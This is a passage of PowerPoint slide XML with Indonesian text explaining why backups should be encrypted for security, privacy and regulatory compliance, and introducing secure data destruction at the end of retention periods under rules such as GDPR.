              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ekstra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencurian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berurusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelektual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dagang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>reputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>parah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerugian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>finansial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsekuensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Salinan data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diabaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>yurisdiksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mewajibkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghindari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>denda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukuman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketidakpatuhan</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155</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="337903899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Pemusnahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Data yang Aman</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengharuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemusnahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelolaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>periode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memusnahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internal dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekaligus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mematuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Data Umum (GDPR) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
